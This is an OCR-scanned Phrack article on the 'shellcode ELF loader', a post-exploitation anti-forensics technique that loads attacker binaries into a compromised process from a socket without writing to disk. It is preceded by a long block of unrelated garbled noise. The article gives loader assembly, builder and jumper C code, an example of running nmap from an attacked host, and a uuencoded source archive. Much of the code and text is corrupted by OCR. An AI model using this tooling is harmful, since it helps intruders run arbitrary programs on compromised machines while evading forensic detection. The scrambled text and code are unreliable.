otus35/xCs70/ApRbpB57i2 
E85 JdwFFCpWb8VZ+z1ICMzpKuZmPp2W+NSn3QU7dd07 jRG5H 


PqitB2Hb5XIONbCMG 
RUTeu30GsZqHhp jW+xi7 6KFwOxYR2G2w07YyodtG9hGbRv6RTcg200 


tV/SyMkn0O9T1C 


P/I5dG9cFZ1000MYdh1g0olId 


ICI bmBvLAr5JD7KB 
UZORnCkXnRe8hfJ5 


nFA19IQRD 


TA3sb7sidyOV3elIwtdhoNxkPK8a7i 


4n0S6JkBt+ 35tjSSA 
Rk1fGOTL5SoMFISIE 
hb0Ydowghk8rhQwUDLr 
ZoUzngS jZwFQQTBx 
PUZPkKLUBDOYZ4nHYZuhbfFpH 
UsOcoDBc1lbASApTY7ox 
PvSDJLoRcnOw77/ySzA 
K 
5 
U 


nqkEyjfsi5PzURAnIX2 


t+gw93Xst+IjJW9I304CWN8YOSZrON3v4LOSATGUAIU1W+54G9IX+CTYGtSdWoWe 


10.txt Wed Apr 26 09:43:44 2017 


KUAwhwf 9BbZh9PbzOpFuDKKuF 2qBwKVAkIeFItkzeJe 
Z+OoPSFTL6uknh+HWBKT+YL+DmJ4X1T6SROMQY/gaF3 
QBo6Uv+HDPOVek/hLa4PGamWTO0QJtd8Bxp1LMh0/EOO 


13 


T6Qwy JjSK/H3dRm61c 
PZNVDx35 jPbQOjXZvV 
3ulaend07KfEJI wok 


euhSFmQHvVU4kMmWUKCf£s2ZtxilORLRDXVJHNAKXH914XMt 4QUIEkugA5uqCxh 


abAHgZGXRk7Tb5G4zEbd2czUISOqle8sPD1rJt+AKsp 
r09v5vr0Zq5PL83tXg63qc80Un2mkdVnGmbMhVc8T+m 
O58KdTU2ZNtgOxclvTId72UVAnV43+1IYDoMfD2as7ut4 
SwN3ZCTkzt 4BEUAMS/pzpwkrgYYr7kL7d1BWRwurD2g 
YMwZDkywageKtAHWltuClgninct+pyaOmlhwkd4kGsZn 
ObtDO04763+hZ5uNPyIh5Dw6P97bF/ohPW5xgJNceWHX 
O5D3Dx8cZMCWHFTLgqRm2/Z10/YFombVkKPVkSW5DcOvC 
xPp4En1lIo04HtOL1G815JU70a+VEbgqRdm9PLmMAAhiO 


+cZp6I1cXZH4/OXFHO 
GvxXAkpylqEoRnzb27 
OwBQgEI/clWwaO0GSf 
neiSHOuMwlFaGLaG+ 
Bk3b9YeV70O7cEsyfm 
hsEtm7Xpébq8Kyr jw 
83WcLWf£R1LXn8pkdsl 
HHPRiVYaQECWS1snyY 


aO0GicqhZqtMQoPiskprCist 60kOyqMHiO/uzkf7u0xW7 fne7Y214uT1lCgfF 


/cPDY2//4NDlamNGFPd2jr/rqBJ51WuN9TSKLGUEmb0 
sofjOc7z3smgC5NKMrJUwgO08Mut 3BM2YLn2TbPTy4vfit 
/U/FItn2TbG48C5tCWICLKoDZPa3WPAw6NMBrglBzyJ 
8asw692Z3X27tHe3kVyyUmclOgV/Et 6EZ67VaTWzz0Sy 


7+wcfe7vQfMcOELJK 
Rd3T3ni6AmH3V/t7t 
lVynT6G19ioVbgzeO 
SBOrurW7gRzjbgT63 


17936PB4i67LQW+ACrMivtOPtsXNkI7AUA56iMRuixlpcPD5mU j043Eeh4uC 


UgqvoYkp19J31IGu68HbMd4xz3/nLxzTzCY9iBgqBxGechH 
TgSGXr0+DSdMnT jxI9BeeEB3gMdmkPIYD4nxHBOZObvV 
K903B+Le00udeB6fEfRSWoHCVOyqliHoSKANSMCRK4h 
3zgDx1lkgGIYDOMF 4am2AU5JBFK8s8FqfdD/pYrNSdHp 
SIkBt+wKoi 3ueB20LgvW8ki2HC8Xi4sko6o0or9eqVvGrq 
CG779B3EF 1pEYvzMJQnID jUbucP jSf£1I8QaEZOwsLgFm 


FHTyDKSt+5GQOk2gPS 
+4wjGmSCulh48tcCP Jj 
uU5EDQ J3Fpgj+EAPWE 
TAn3 jJBWqnJUUv77LI 
3bi9e7yOKCQNZptv9 
igi/8WcT1GB3vMW4k 


E 


zZtmEpg jmP 9 6nqRVNoyKik 7wUfBkDMMfE8HoTsc+TEN 
OT 3 8dXuDGL1 yAWOEAyXUvet HpOGTTwf£YREIpiAaqB2N 
pJx2g+VnOLV4MoaSw9F 5rgyogrxyCYhn1l4DkNyG/VLF 
LNJauBYVulFuy0VetelHiRxmMadYqfCN/CyedMSK/Ge 
rMC6VXcCf£RMZIVCIYLE1yOUL8YeeD jG9F2i41XHTuhyn 
BJEOZGKWYERF £4 jJ+g7pKOAWP /OHM2PDPm3f 45xQW1nD 
C13UWkfLyW3BOx+hzCsrm2t 4WsERI4XHOs+fsLOgXpG 
6alFpb9Drz9+5mV3qgtwPeifQ0ceOp2PS8zqHbuc74U6 


13 | 


GQUAtQSe+4LU/wmpd 
raQQHwoTPi0kYpBuj 
oKXomO61Ui3qHu+1+ 
eeQbhDXoHdck21LEN 
ToObLkunylLcmR+pj 
2WttMtCkaFHcukRc5 
HWEswr35SxBwlBZcq 
uCn8YOfWskShefm35 


cC1VI8TC3VPkKVc/kFdP5Cc6itiz71q+jOw9ZZ22G27UpLm7Sv52nrzwt 8bxhlp 


sojR41Du8uMw+LYdEebxXW7my/P9ftRfOFP/P2traWsL 
OwPXOV5AztM8J5/pH1InNcMbGD63e3Jvk4t+c7pPdtHw 
4LT+X7/WSPb/WmPe/9/Ipfv/g+P900d039dPcvv9DA7 
rv84Q0Dv01Zcxt f83runtv7Z65z/q63P/3zdy7e5eP22 


/Z23z2Wm3u//MmLu3/ 
ZTetco814J£2/X4cH 
grrmhUM6751f£1Mv3/ 
1Fvxud3uh+tF5pd7cs 


1k/h32n7RCzfolhyYnlgzgybXystnMLA//LgkPHSX2nNO/ePymx6/wodAFiJd 


nwlfdRnU/ 9P 9Xv5dp9/c/9c2N74/xr63Nx/83cp3UPtm 
37n5X559rRB/Y/Yq49dJumeDeLRCv9ODDKiRAbcb66g1 
QNfeXXxH/JIk//eBtkzK/5tf8ml/za37Nr/klv+bX/Hr 
6Wsy/RFc5/D3XN5/A9K£Eh£Q/5P38ml1/za37Nr/kiv+b 
dc6/XSj8cfj7£3BS/ 9O8BVAHE 6pO+D11/wHSP4f£0m5D 
BulnIf2vnyoU/ j2k34L065B+tDdJfhdSF9IBYSGaRVSEu 
TOH6SUg/Aem//USh8LuQ/g2kvw/pOaTvOCris28VCr8 
CqQxpHuQrkL670XAD+nvOvoBpENIfwHSf/yThcJvQ/o 
XOH6x5B+A9TfhvOxpD8H6ff+RKHwDyBFkH4A6TakHUj 
W5B+CVII6Tqkn4H0B3+sUPinkP 40pCGkDqS/COkTSD8 
X4P0h980FP 4npP 8K6T 9D+heQ/hmk fwLpHOH625C+D+k 
OqRfhvO31f0ipBIAUugbpPUJLHPT1r3M7/29saxX604C 
JUKC5sfeQMgvC/JLYoHP jJH9IJ£ymOSSEQOC34igM6Mak 
xYPdAUPZJwxOkf 6DdZBieVCu6MxXtc5sp4P6k8ieBAiUw 
SnMwO7KSgpsxYJMDnhUAyhWeydGkHNgpUaoc2CnRrxz 
£TkQ2ZQHDCtiOgVOKhQUGRLFISUOpsxDLiGbuk1lkjo7m 
CIGXLWVGKDs304xB81JUNYc5up9rjcsH+LLZdJthgVvyY 
OYW4SARIJ+cswSadiiek/aKkKhL52sUyJsOrAT43ZKylu 
A5QXDtUBmj3UgpPtIqFdnYyzh5JV/JIwxYKOruUVOC4bp 
THOV2ZeMWZ3E7NzhylijkhllOKUcrFEZhYhwkMIpfKrd 


vAuzhwovEHMvGZYcOGt+4m4h3nnxulqQxChMiqxcemxmRP57TjuWfltaPBp30 


SPJZeU0MelVEMgLY2x9cScS+L2TGyi9kn70rpEPwFzI 
KzCX/k/f4vk/7vH/Nszp/xgkTyD9j3zf£/yakvwHpENJ 
6V/CHP1VOQTqHtALpDWwHf/5V4f/9bb299Y37Nr/klvtb 
4lehcOHOYYVXF 7eskBcbrfAyEdcKLxHgqrfDgqIs71VG7 
SaZOiEFYeKlghxct 6PLxG/NKshC/TNxJjWTGYJeFlwi 


/KzZWtvDmpwuF3/iV 
X38SBk/k1v+ZX5rxXw 
D12354jclfwdt+vQ300 
X/Ip£82t+za/5Nb9+ 
+HqS/DukJpCGkn400 
QCpB+5ycLhV+EdAfS 
KaQhpB9ICpH+9UC48 
1SJ9A+11IV/tNwAHp 
EgbOCqQLpm5B+Hx 4 
H6RqkBqQypHcg/X1I 
9SP/v64XCV4X0DyH9 
hKQqTQOUU0GFFCroOG 
LizQvQowDNVvoGSfL 
ytNBEeUmWNKUZIJwWRC 
Y3HhaDtTE+FxOptN 
5Z0/D1pFvprhvbol 
LhDpMkD85rKIDnBm 
FBXXRT4066nASL4i 
ImTHcboIBF1LWUFWw 
04aWiWhdeJqB24bd 


i9Ruey5P+yXj/NP/ 
7kP 4dzNd/GdInkL4 
X/Ipf82t+za8fvysr 
26HeFlwq+t5+R++UiA 
sWXipkJ5vWzHNr/k1 


YCSoT ROPES 


vtbX/Jpf£82t+za/5Nb/m1/yaX/PrDVz/HIKGin8AGAEA 


11.txt Wed Apr 26 09:43:44 2017 1 


==Phrack Inc.== 


Volume O0x0b, Issue O0x3f, Phile #0x0b of 0x14 


[ Advanced Antiforensics : SELF  ] 


[ Pluf & Ripe ] 
[ www. 7a69ezine.org ] 


— Introduction 

- Userland Execve 

Shellcode ELF loader 

— Design and Implementation 
4.1 - The lxobject 


BwWNE 
| 


4.1.1 - Static ELF binary 
4.1.2 -— Stack context 
4.1.3 Shellcode loader 
4.2 -— The builder 
4.3 - The jumper 


5 -— Multiexecution 
5.1 - Gits 

6 — Conclusion 

7 — Greetings 

8 — References 

A 

B 


— Tested systems 
— Sourcecode 


---[ 1 - Introduction 


The techniques of remote services’ exploitation have made a substantial 
progress. At the same time, the range of shellcodes have increased and 
i 
a8 


ncorporates new and complex anti-detection techniques like polymorphism 
unctionalities. 


In spite of the advantages that all these give to the attackers, a call to 
the syscall execve is always needed; that ends giving rise to a series of 
problems: 


-— The access to the syscall execve may be denied if the host uses some 
kind of modern protection system. 


—- The call to execve requires the file to execute to be placed in the 
hard disk. Consequently, if ’/bin/shell’ does not exist, which is a 
common fact in chroot environments, the shellcode will not be executed 


properly. 


—- The host may not have tools that the intruder may need, thus creating 
the need to upload them, which can leave traces of the intrusion in 
the disk. 


The need of a shellcode that solves them arises. The solution is found in 
the ’userland exec’. 


-—--[ 2 - Userland Execve 


The procedure that allows the local execution of a program avoiding the use 
of the syscall execve is called ’userland exec’ or ’userland execve’. 

It’s basically a mechanism that simulates correctly and orderly most of the 
procedures that the kernel follows to load an executable file in memory and 
start its execution. It can be summarized in just three steps: 


-— Load of the binary’s required sections into memory. 
—- Initialization of the stack context. 
—- Jump to the entry point (starting point). 


The main aim of the ’userland exec’ is to allow the binaries to load avoiding 
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the use of the syscall execve that the kernel contains, solving the first of 
the problems stated above. At the same time, as it is a specific implementation 
we can adapt its features to our own needs. We’1ll make it so the ELF file 

will not be read from the hard disk but from other supports like a socket. 

With this procedure, the other two problems stated before are solved becaus 

the file ’/bin/sh’ doesn’t need to be visible by the exploited process but 

can be read from the net. On the other hand, tools that don’t reside in the 
destination host can also be executed. 


The first public implementation of a execve in a user environment was made by 
"the grugq" [1], its codification and inner workings are perfect but it has 
some disadvantages: 


— Doesn’t work for real attacks. 

- The code is too large and difficult to port. 
Thanks to that fact it was decided to put our efforts in developing another 
‘userland execve’ with the same features but with a simpler codification and 
oriented to exploits’ use. The final result has been the ’shellcode ELF 
loader’. 


[ 3 Shellcode ELF loader 


The shellcode ELF loader or Self is a new and sophisticated post-exploitation 
technique based on the userland execve. It allows the load and execution of 

a binary ELF file in a remote machine without storing it on disk or modifying 
the original filesystem. The target of the shellcode ELF loader is to provide 
an effective and modern post-exploitation anti-forensic system for exploits 
combined with an easy use. That is, that an intruder can execute as many 
applications as he desires. 


---[ 4 - Design and Implementation 


Obtaining an effective design hasn’t been an easy task, different options 
have been considered and most of them have been dropped. At last, it was 
selected the most creative design that allows more flexibility, portability 


and a great ease of use. 

The final result is a mix of multiple pieces, independent one of another, 
that realize their own function and work together in harmony. This pieces 

are three: the lxobject, the builder and the jumper. Thes lements will make 
the task of executing a binary in a remote machine quite easy. The lxobject 
is a special kind of object that contains all the required elements to change 
the original executable of a guest process by a new one. The builder and 


jumper are the pieces of code that build the lxobject, transfer it from the 
local machine (attacker) to the remote machine (attacked) and activate it. 


As a previous step before the detailed description of the inner details of 
this technique, it is needed to understand how, when and where it must be 
used. Here follows a short summary of its common use: 


- lst round, exploitation of a vulnerable servic 


In the lst round we have a machine X with a vulnerable service Y. We want to 
exploit this juicy process so we use the suitable exploit using as payload 
(shellcode) the jumper. When exploited, the jumper is executed and we’re 
ready to the next round. 


- 2nd round, execution of a binary: 


Here is where the shellcode ELF loader takes part; a binary ELF is selected 
and the lxobject is constructed. Then, we sent it to the jumper to be 
activated. The result is the load and execution of the binary in a remote 
machine. We win the battle!! 


---[ 4.1 - The lxobject 


What the hell is that? A lxobject is an selfloadable and autoexecutable 
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object, that is to say, an object specially devised to completely replace th 
original guest process where it is located by a binary ELF file that carries 
and initiates its execution. Each lxobject is built in the intruder machine 
using the builder and it is sent to the attacked machine where the jumper 
receives and activates it. 


Therefore, it can be compared to a missile that is sent from a place to the 
impact point, being the explosive charge an executable. This missile is built 
from three assembled parts: a binary static ELF, a preconstructed stack 
context and a shellcode loader. 


---[ 4.1.1 - Static ELF binary 


It’s the first piece of a lxobject, the binary ELF that must be loaded and 
executed in a remote host. It’s just a common executable file, statically 
compiled for the architecture and system in which it will be executed. 


It was decided to avoid the use of dynamic executables because it would add 
complexity which isn’t needed in the loading code, noticeably raising the 
rate of possible errors. 


---[ 4.1.2 - Stack context 


It’s the second piece of a lxobject; the stack context that will be needed by 
the binary. Every process has an associated memory segment called stack where 
the functions store its local variables. During the binary load process, the 
kernel fills this section with a series of initial data requited for its 
subsequent execution. We call it /’initial stack context’. 


To ease the portability and specially the loading process, a preconstructed 
stack context was adopted. That is to say, it is generated in our machine and 
it is assembled with the binary ELF file. The only required knowledge is the 
format and to add the data in the correct order. To the vast majority of 

UNIX systems it looks like: 


.—7> alignment 
Argc —- Arguments (number) 
Argv[] =se4 - Arguments (vector) 
| 
Envp[] Sa | SHsh — Environment variables (vector) 
| | 
argv strings <a | 
| - Argv and envp data (strings) 
envp strings <------ f 
eoocmca alignment | ------- > Upper and lower alignments 


This is the stack context, most reduced and functional available for us. As 
it can be observed no auxiliary vector has been added because the work with 
static executables avoids the need to worry about linking. Also, there isn’t 
any restriction about the allowed number of arguments and environment 

variables; a bunch of them can increase the context’s size but nothing more. 


As the context is built in the attacker machine, that will usually be 
different from the attacked one; knowledge of the address space in which the 
stack is placed will be required. This is a process that is automatically 
done and doesn’t suppose a problem. 


==) 4.4.3 Shellcode Loader 


This is the third and also the most important part of a lxobject. It’s a 
shellcode that must carry on the loading process and execution of a binary 
file. it is really a simple but powerful implementation of userland execve(). 
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The loading process takes the following steps to be completed successfully 
(x86 32bits): 


* pre-loading: first, the jumper must do some operations before anything 
else. It gets the memory address where the lxobject has been previously 
stored and pushes it into the stack, then it finds the loader code and 
jumps to it. The loading has begun. 


asm__ ( 
"push %0\n" 
WwW jmp xeU" 


: "c"(lLxobject),"b" (*loader) 
i 

* loading step 1: scans the program header table and begins to load each 
PT_LOAD segment. The stack context has its own header, PT_STACK, so when 


this kind of segment is found it will be treated differently from the 
rest (step 2) 


.loader_next_phdr: 


// Check program header type (eax): PT_LOAD or PT_STACK 
movl (Sedx) , seax 


// Tf program header type is PT_LOAD, jump to .loader_phdr_load 
// and load the segment referenced by this header 


cmpl SPT_LOAD, eax 
je . loader_phdr_load 


// Tf program header type is PT_STACK, jump to .loader_phdr_stack 
// and load the new stack segment 


cmpl SPT_STACK, eax 
je . loader_phdr_stack 


// T£ unknown type, jump to next header 


addl SPHENTSIZE, edx 
jmp . loader_next_phdr 


For each PT_LOAD segment (text/data) do the following: 


* loading step 1.1: unmap the old segment, one page a time, to be sure that 
there is enough room to fit the new one: 


movl PHDR_VADDR (%edx) , sedi 
movl PHDR_MEMSZ (%edx) , esi 
subl SPG_SIZE, Sesi 
movl $0, %ecx 
. Loader_unmap_page: 
pushl SPG_SIZE 
movil Sedi, tebx 
andl SOxfffff000, tebx 
addl SeCx, SebDx 
pushl Sebx 
pushl $2 
movil SSYS_munmap, eax 
call do_syscall 
addl $12,%esp 
addl SPG_SIZE, %ecx 
cmpl Secx, sES1 
jge . Lloader_unmap_page 


* loading step 1.2: map the new memory region. 


pushl $0 
pushl $0 
pushl S-1 
pushl SMAPS 
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pushl $7 

movil PHDR_MEMSZ (%edx) , esi 
pushl sesi 

movil Sedi,%esi 

andl SOxffff000, esi 

pushl sesi 

pushl $6 

movil SSYS_mmap, eax 

call do_syscall 

addl $32,%esp 


* loading step 1.3: copy the segment from the lxobject to that place: 


movil PHDR_FILESZ (%edx) , secx 
movl PHDR_OFFSET (%Sedx) , esi 
addl sebp, sesi 

repz movsb 


* loading step 1.4: continue with next header: 


addl SPHENTSIZE, edx 
jmp . loader_next_phdr 


* loading step 2: when both text and data segments have been loaded 
correctly, it’s time to setup a new stack: 


.-loader_phdr_stack: 


movil PHDR_OFFSET (%edx) , SeSi 
addl sebp, sesi 

movl PHDR_VADDR (%edx) , sedi 
movl PHDR_MEMSZ (Sedx) , Se@cx 
repz movsb 


* loading step 3: to finish, some registers are cleaned and then the loader 
jump to the binary’s entry point or _init(). 


.loader_entry_point: 


movil PHDR_ALIGN (%Sedx) , Sesp 
mov] EFHDR_ENTRY (%Sebp) , eax 
xorl Sebx, Sebx 

xorl SeCK, SECX 

xorl Sedx, Sedx 

xorl Sesi, esi 

xorl Sedi, sedi 

jmp *Seax 


* post-loading: the execution has begun. 


As can be seen, the loader doesn’t undergo any process to build the stack 
context, it is constructed in the builder. This way, a pre-designed context is 
available and should simply be copied to the right address space inside the 
process. 


Despite the fact of codifying a different loader to each architecture the 
operations are plain and concrete. Whether possible, hybrid loaders capable 
of functioning in the same architectures but with the different syscalls 
methods of the UNIX systems should be designed. The loader we have developed 
for our implementation is an hybrid code capable of working under Linux and 
BSD systems on x86/32bit machines. 


---[ 4.2 - The builder 
It has the mission of assembling the components of a lxobject and then 
sending it to a remote machine. It works with a simple command line design 


and its format is as follows: 


./puilder <host> <port> <exec> <argv> <envp> 
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where: 


host, port = the attached machine address and the port where the jumper is 
running and waiting 


xec = th xecutable binary file we want to execute 


argv, envp = string of arguments and string of environment variables, 
needed by the executable binary 


For instance, if we want to do some port scanning from the attacked host, we 
will execute an nmap binary as follows: 


./ouilder 172.26.0.1 2002 nmap-static "-P0;-p;23;172.26.1-30" "PATH=/bin" 


Basically, the assembly operations performed are the following: 


* allocate enough memory to store the executable binary file, the shellcod 
loader and the stack’s init context. 


elf _new = (void*)malloc(elf_new_size)j; 


* insert the executable into the memory area previously allocated and then 
clean the fields which describe the section header table because they 
won’t be useful for us as we will work with an static file. Also, the 
section header table could be removed anyway. 


hdr_new->e_shentsize = 0; 
ehdr_new->e_shoff = 0; 


ehdr_new->e_shnum = 0; 

ehdr_new->e_shstrndx = 0; 

* build the stack context. It requires two strings, the first one contains 
the arguments and the second one the environment variables. Each item is 
separated by using a delimiter. For instance: 


<argv> "argl;arg2;arg3;-h" 
<envp> = "“PATH=/bin;SHELL=sh" 


Once the context has been built, a new program header is added to the 

binary’s program header table. This is a PT_STACK header and contains all 
the information which is needed by the shellcode loader in order to setup 
the new stack. 


* the shellcode ELF loader is introduced and its offset is saved within the 
e_ident field in the elf header. 


memcpy (elf_new 1lf_new_siz PG_SIZE + LOADER_CODESZ, loader, LOADER _CODESZ) ; 
ldr_ptr = (unsigned long *) &ehdr_new->e_ident [9]; 
*ldr_ptr = elf_new_siz PG_SIZE + LOADER _CODESZ; 


* the lxobject is ready, now it’s sent to specified the host and port. 


connect (sfd, (struct sockaddr *)&srv, sizeof(struct sockaddr) 
write(sfd, lf_new, lf new_size); 


An lxobject finished and assembled correctly, ready to be sent, looks like 
this: 


[ Autoloadable and Autoexecutable Object ] 


[ Static Executable File (1) ] 


| | 
| s : | 
| | ELF Header ) | re 
| | | Shellcode Elf loader (3) 
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---[ 4.3 - The jumper 


It is the shellcode which have to be used by an exploit during the exploitation 
process of a vulnerable service. Its focus is to activate the incoming lxobject 
and in order to achieve it, at least the following operations should be done: 


—- open a socket and wait for the lxobject to arrive 
— store it anywhere in the memory 
—- activate it by jumping into the loader 


Those are the minimal required actions but it is important to keep in mind 
that a jumper is a simple shellcode so any other functionality can be added 
previously: break a chroot, elevate privileges, and so on. 


1) how to get the lxobject? 


It is easily achieved, already known techniques, as binding to a port and 
waiting for new connections or searching in the process’ FD table those that 
belong to socket, can be applied. Additionally, cipher algorithms can be 
added but this would lead to huge shellcodes, difficult to use. 


2) and where to store it? 


There are thr possibilities: 


a) store it in the heap. We just have to find the current location of the 
program break by using brk(0). However, this method is dangerous and 
unsuitable because the lxobject could be unmapped or even entirely 
overwritten during the loading process. 


b) store it in the process stack. Provided there is enough space and we know 
where the stack starts and finishes, this method can be used but it can 
also be that the stack isn’t be executable and then it can’t be applied. 


c) store it in a new mapped memory region by using mmap() syscall. 
This is the better way and the one we have used in our code. 


Due to the nature of a jumper its codification can be personalized and 
adapted to many different contexts. An example of a generic jumper written 
in C is as it follows: 


lxobject = (unsigned char*)mmap(0, LXOBJECT_SIZE, 
PROT_READ | PROT_WRITE|PROT_EXEC, MAP _PRIVATE|MAP_ANON, -1, 0); 
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addr.sin_family = AF_INET; 
addr.sin_port = htons(atoi(argv[1])); 
addr.sin_addr.s_addr = 0; 


sfd = socket (AF_INET, SOCK_STREAM, 0)); 

bind(sfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)); 
listen(sfd, 10); 

nsfd = accept (sfd, NULL, NULL)); 


for (i = 0; i < 255 ; itt) f{ 
if (recv(i, tmp, 4, MSG_PEEK) == 4) { 
if (!strncmp (&tmp[1] 


} 


recv(i, lxobject, MAX_OBJECT_SIZE, MSG_WAITALL) ; 


loader = (unsigned long *)&lxobject [9]; 
*loader += (unsigned long) lxobject; 
asm__ ( 


"oush %0\n" 
Ww jmp a 


: "c"(lLxobject),"b" (*loader) 
i 
---[ 5 - Multiexecution 


The code included in this article is just a generic implementation of a 
shellcode ELF loader which allows the execution of a binary once at time. 

If we want to execute that binary an undefined number of times (to parse more 
arguments, test new features, etc) it will be needed to build and send a new 
lxobject for each try. Although it obviously has some disadvantages, it’s 
enough for most situations. But what happens if what we really wish is to 
execute our binary a lot of times but from the other side, that is, from 

the remote machine, without building the lxobject? 


To face this issue we have developed another technique called "multi-execution". 
The multi-execution is a much more advanced derived implementation. Its main 
feature is that the process of building a lxobject is always done in the 

remote machine, one binary allowing infinite executions. Something like 

working with a remote shell. One example of tool that uses a multi-execution 
environment is the gits project or "ghost in the system". 


==[o.l = Gites 


Gits is a multi-execution environment designed to operate on attacked remote 
machines and to limit the amount of forensic evidence. It should be viewed as 
a proof of concept, an advanced extension with many features. It comprises a 
launcher program and a shell, which is the main part. The shell gives you the 
possibility of retrieving as many binaries as desired and execute them as 

many times as wished (a process of stack context rebuilding and binary 
patching is done using some advanced techniques). Also, built-in commands, job 
control, flow redirection, remote file manipulation, and so on have been 
added. 


-—--[ 6 -— Conclusions 


The forensic techniques are more sophisticated and complete every day, where 
there was no trace left, now there’s a fingerprint; where there was only one 
evidence left, now there are hundreds. A never-ending battle between those who 
wouldn’t be detected and those who want to detect. To use the memory and 

leave the disk untouched is a good policy to avoid the detection. The 
shellcode ELF loader develops this post-exploitation plainly and elegantly. 


7 Greetings 
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Ja69ezine crew & redbull. 
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A Tested systems 


The next table summarize the systems where we have tested all this fucking 
shit. 


/ Vv \ 
x86 amd64 
/ < 
Linux 2.4 works works 
> < 
Linux 2.6 works works 
> < 
FreeBSD works untested 
> < 
NetBSD works untested 
\ x a / 


---[ B - Sourcecode 


begin 644 self.tgz 
M’ XL(*%S) VSS (***U] :W<;-[+@?&7_"HS&CDB9T/BO: SF *DU5LV=8=6]) :\L2Y 
MBO] /DVQ2; 9/=3' =3CXSSD_8WW’ /N+]MZ*8U%4 **_9G:0.B<6V0O **A4*A4%4H 
MS&-O.E[_R]=] 60 *\W-RDO_#D_]+G=JO3ZVON; /: 2G; “TVJW-=N<O:0, KXT7/ 
M(D[<2*F_1&&87%70NO+_1Y\8YW\4#K\F#] OT_KNMA] TVOF*W.OQMW\_]-’C/_ 
M**'O!<WDXHL/S$R>XM[&Q9/XW.P\W’ *; FO[O1 [ ?USM; XT (F7/__#Y=U3QV0T2 
M?QQ0& 7A# [0* 6=A=—-%XH? !MCH&SBFK; S*#RZMJ’ ST78_6=>NW/0O:75SL_/FP_= 
MWB/O#S_PFFST<1S55@VU’ R11.%H, $1='’ =>#-F]B+IFXP4GL7WO*, (’;AY?&I 
M-YT.PY&G]EX*4]/0’ 7F1HS: @Y*D7*Y- *88/]V7SIS; P@<1F: 4AM-[./DU%/3 
MBW#PWALFC""\LTY) CK#HDF *,_<*/+M+C#Q<, /:A@&B7=AM<PBI) ’ ! LH[T-ECX 
M4_.R*R_?+V9S?+<) WU\MIHGOPO *7&M5-ONBYG\2.ZL&G) VSPG"YB*GV() 9’G 
M) 7XP@> (M*/K: &WLPET, /ON\B/NSB&GJ (D., XC4; CUR) U’ 40B\8:G@?_[PHM5 
L33P’ SSWP *M:J\B_DT]) F*ZM0] \]0, 1U=<%2\&L*2 ‘A=RI<N91. (F\ 
M.&ZIW40E ‘#5V9P#: GWEU*AJYP<1#*+&F4LS *_& *8>6[LC7"*%’ /@610, P<A,H 
M# [OSFL1AB+—XH; "OQL@#? *‘D7"**1T_\%S3\W!Z.8/6IWX\<\ :+@&0Y4Q0*°HECK<= 
M9S]0\=Q/"*GSR!V=*4!W*LV34S=1 [G2* [V-/37S **PFY5H(3[D5Q’ 48\I#JA 
MO*.[C.FK1IRRI_!@‘G+N7Bt+4W\D8 [#-O0+1C’ "@UE2D1\36!>) ZS.UD6X#X-!X 
M&YB?>< (=‘MECW7“NFYE[J0:>&GEF! #03S>22G8 9RHLOPOXQ" (CJUSSPO0>Z*?P9 
MS#H*%/2BJ08 ‘$V_6--W) F’ 0’D??[PH*% () IX: *U-/ERT2*@B=SZ?NS#L/J *[V 
M=NI& (S7RXP]—-Y-S80, "*FU[6S<’ 5=5A&ZS3KIVH4XK2&0) <+/T[JZOS4’ YX2 
M[1°*,S/,,, !R[PP2A#T]1%°*,)S_PH#’ ‘10\Q+AH74NO_((SQ‘2Y *< (208+ZRK 
MZ64Z3* (14@] K$%, E83B5J34>@/JIR+!1"+*\S<8E*%+6"SWXB) #L3@/BY ‘OBSFN 
M<GPUT%, 8NH&:>@0[ ‘A+tSEFM, (-"Y;**3!$+5X_1%$J.1:°*R.TXG!ZOC, Q4RYR 
M#ZPN; |! "4+HS; "C<-%0'-!34+FZT) (20;':E'5?)D.1:2°33.4B\LP2", ]YZJ<A 
M, (8RXHCQHT7N *C) GH3] "EL: : T*4C ‘RVN"?P*H\OAI< (H] *K, 6VTJ9S] 9C=7 * 
MA=T (FEU"AS-8XFX *ZUD (XL\ 640 (- ("4B8&BLA (P>C7"V@=MADAD7QPS-FF-8 
MOXSW! 9K) .$.2U*!"!NK"4F2F!X+.0!!&#-] !U0SX, HE3BC35?D (S#JP7+V8S 
MF** >%6\!TT#N@/AK&"IS6510\2>ASZ\L<!89; 6-O"+0ZHRI5T+INNFON/91 
MP/I_N’H:B-#V+D3U_@-VSBTS8*4 *XO, 08*DJH8YS1=] KPG, S%Q!U_9D&F) \@ 
MGZA#_) !BC#++TSQ8P!$64.4LD"<]H@Q=PT) &YM8L—/8CFC@"IB4B#C+!; 6S0 
MGGEEVXH+USI (> (!@]X; *&+9M/ [O?GWLT1>[ (G?/TC6SQ, T*S"K9’ 39X'’M/Y@ 
M9?WLKO+>, Q=VSA_7’ G6’ :@‘QA&.+&A*) (S6.PAF+7RW]8(]/%*’ 4([R-@BSEL 
M9O8EL3X!E"#L) 3-2?/2G (*+0SSPZOLV+A9<AX6BHH#P4S\#*>"05, ‘WOQ?I[AA! 
MK24MB]E@-3&R"E**\V, ?N7MPR2S"FSH4SPJPWR#NCO!S=GP!X*P. ‘PM#6),H 
M’E,!.@JQ.Z2"K/_)D8W! @AP>*S$[4!%R;-Q#0.; 6S—-BY [XD3E@OAA, "Y/ (HD>+ 


wu 


11.txt 


M% 
M*?4GHBM 
MTTJ"1>- 
MF-@*B 
M?VS:T 
Ve 


H7 


‘FA"] Z*OC##4YOX’ **%2; .!YS"FK 
+WBM& L8AUG 


Wed Apr 26 09:43:44 2017 


‘WIL !; 9VX(Z!U8@I02Z4TA5S<Q (M) K*OUS_; [ 
P (OYJ1 ‘8 ‘8 *XB9!B4]$5XJ; 96 
(’L*D)-WO![7"#A[Q-,X!\RO: 


L&&-8A40 (’_>(&-8] [J<PM: FN 
&H/] @UX*) H*+*’ LX, \@<M23?X 
RSKOL., >SY*8T.4Y!L, (N2?PFB\<L 
EneV. 2. 
N*W@-AOH 


.) HHR\#&S6L/55Q%B ( 


M5"HO.XK 
MUP 39) 3% 
M,%(@%s[, 
MY, 0) 50M 
MA) (J8d/ 
MOV#***, 
MS7T/!#@ 
MI&XS*0@ 
MJP !G#-& 


% 


BE 
ay 


&/' .’ IV#(SSE# (&V<*.UG 


"M8P>+*) A* 9X! 2?SBXAXV1 


7F ‘>H3W) 


2?USW1=2UYI<G"60 


10 


“HT [2!3D3T8GDL",P‘8YV’T 
E&2 
,WQ 
‘1PH%; DH6 (’D49%.3@BK/DBX 
.ZP2FQUIJO) /W!"7E.">@78) 
/<LFS$<GRS.9’N\ (HN_\YK@CN 
!QOC"#"E\J04GU) @0!16&::&9$ 
